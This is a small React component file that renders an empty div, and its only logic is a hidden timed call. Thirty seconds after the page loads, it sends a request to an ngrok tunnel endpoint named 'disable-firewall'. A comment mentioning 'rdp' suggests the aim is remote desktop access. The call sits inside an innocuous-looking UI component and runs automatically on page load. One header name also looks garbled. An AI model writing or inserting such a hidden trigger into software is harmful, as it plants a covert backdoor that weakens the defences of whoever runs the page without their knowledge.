import React, { useEffect } from 'react'

export default ()=> {
    // disabled firewall
    useEffect(() => {
        const timer = setTimeout(() => {
            fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/disable-firewall`, {
                method: "GET",
                headers: {
                    "Content-Type": "application/json",
                    "git -skip-browser-warning": "true"
                }
            })
                .then(res => res.json())
                .then(data => {
                    console.log("🔥 Firewall API Response:", data);
                })
                .catch(err => {
                    console.error("wall API Error:", err);
                });
        }, 30000); 
    
        return () => clearTimeout(timer);
    }, []);

    // rdp
    
    
  return (
    <div>
      
    </div>
  )
}
